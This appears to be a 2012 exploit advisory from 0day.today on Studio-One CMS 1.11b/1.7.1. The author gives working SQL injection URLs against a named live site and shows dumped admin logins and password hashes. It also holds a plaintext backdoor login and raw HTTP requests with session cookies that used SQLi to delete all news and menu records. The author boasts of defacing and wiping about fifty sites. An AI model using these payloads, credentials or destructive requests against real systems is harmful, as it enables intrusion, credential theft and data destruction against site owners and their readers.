Studio-One CMS 1.11b / 1.7.1 Blind SQL Injection Vulnerability

🗓️ 04 Sep 2012 00:00:00Reported by AkaStepType
zdt🔗 0day.today👁 48 Views
Security vulnerability in Studio-One CMS 1.11b / 1.7.1 from studio-one.am with remote blind SQL injection and backdoor account
========================================================
Vulnerable Software(S): CMS | 1.11b/CMS | 1.7.1 From Studio-one.am
Vulnerabilities: This Content management systems suffers from
         Remote Blind SQl injection and Backdoor account.
Software License: Commercial
Vendor: studio-one.am
Discovered and Exploited: In Wild
========================================================

I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=
********************** REALLY! ********************************************
******************ENJOY MAXIMALLY**************************************


Full Disclosure:


The following CMS | 1.11b and CMS | 1.7.1 (From Studio-one.am)  content management systems
suffers from Remote Blind SQl injection and Backdoor account.

//TRUE
http://galatv.am/news/other/aimm-naxagahh%27%20or%20sleep(10)--%20and%205=%275.html


We got time delay:

galatv.am CMS | 1.11b

http://galatv.am/news/other/aimm-naxagahh%27%20order%20by%2026--%20and%205=%275.html
Got Columns count: 26



Problem number 1: We can't use =>,<= Otherwise we'll get 404 (May be rewrite rule?)

Bypass?Pretty simple: hex() representation of =>,=> so it's=> %2C

http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html



http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html


Success!


http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html


21 22 21 24 14-


http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat%28table_name%29%2C22%2C23%2C24%2C25%2C26%20from%20information_schema.tables--%20and%205=%275.html

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,s1_ads,s1_ads_menu_rel,s1_ads_ml,s1_adsgroup,s1_adsgroup_ml,s1_answers,s1_answers_ml,s1_autor,s1_autor_m 


So we need obtain:

login
password

 from

s1_users


galatv.am/news/other/saimm-naxagahh' union select 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat(login%2Cpassword)%2C22%2C23%2C24%2C25%2C26 from s1_users-- and 5='5.html




100%
----------------------------------------------------
admin
6dedf4ba59fbcd8c2d72eec63738fc6d
GalaAdmin
4bad4ecf9b88e344a7e6fbe517d4e590
----------------------------------------------------
newPass123



Printscreen: http://s44.radikal.ru/i106/1209/3c/64f2a7cf8278.png



OwNEd! http://zone-h.org/mirror/id/18297506

Done!

Ok.After gaining access to administration panel i noticed theris 2800>= news exists in database.
Ownage without "rm"s or without "drop"s agains .am domains is not interesting anymore.
Searching..Searching..Got it:

Here is truncating way:


------------------------------------------------------------------------------------------------------------------------
Live HTTP Headers:

URL: http://galatv.am/admin/news-content/news?viewAjax=1&action=delete&tpl=view.tpl


Host: galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 18
Cookie: PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73
Pragma: no-cache
Cache-Control: no-cache



POST DATA:

viewAjax=1&id=1000000000000 or id!=3--

*REPLAY*

------------------------------------------------------------------------------------------------------------------------


Printscreen: http://s019.radikal.ru/i625/1209/95/fccad046aa62.png

BoOm!) All news was successfully "truncated" using SQLi vuln)




Then i needed to truncate menu sections:

Same technique:


------------------------------------------------------------------------------------------------------------------------
Live HTTP Headers:

URL: http://galatv.am/admin/content%20elements/menu?viewAjax=1&action=delete&tpl=view.tpl


Host: galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 16
Cookie: menutreeNodes=%5B1%5D; PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73; __utma=137480943.837184604.1346617574.1346617574.1346617574.1; __utmb=137480943.2.10.1346617574; __utmc=137480943; __utmz=137480943.1346617574.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Pragma: no-cache
Cache-Control: no-cache



POST DATA:
viewAjax=1&id=27 or id!=007

------------------------------------------------------------------------------------------------------------------------

Again Boom!)




=================== WE ALSO LOVE BACKDOORS========================

This CMS also suffers from backdoor account which has full administrative privileges.
It is also hidden account: This means you can't see it from administration panel:

Print screen:
( Basically: theris 1 backdoor account and 1 legal administrator.
Notice: backdoor account isn't visible anymre )

http://s53.radikal.ru/i140/1209/c4/685d07418e00.png



I used this administrative account to deface and "rm" approx 50 .am sites)

Login: admin
Pass: newPass123



=====================CMS version 1.7.1 ==============================
How it looks: http://s019.radikal.ru/i602/1209/2d/85589f0d9f49.png

Also suffers from backdoor account:
Print screen:
http://i021.radikal.ru/1209/83/8390644da6b5.png

The account named: admin still invisible again.




<title>:: CMS :: | 1.7.1</title>

Demo:
http://new.galatv.am/admin/

Login: admin
Pass: newPass123




This version also is vulnerable to SQLi

Again i'm "rm"-ned all news using SQLi:


URL: http://new.galatv.am/admin/news-block/news?action=delete&viewAjax=1&tpl=dt/edit-dialog.tpl


Host: new.galatv.am
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Cookie: PHPSESSID=bqu6dn6ks70iqocivfioetomh7
Pragma: no-cache
Cache-Control: no-cache



POST DATA:
btnDelete=Delete&btnCancel=Cancel&id=1 or id!=011111111111111


Returned: 

{"succsess":true,"records":["1 or id!=011111111111111"]}


==========================================
To studio-one.am: We luve backdoors too;)

=============== THE END ===================


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
1337day.com
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep



#  0day.today [2018-04-14]  #
04 Sep 2012 00:00Current
7.1High risk
Vulners AI Score7.1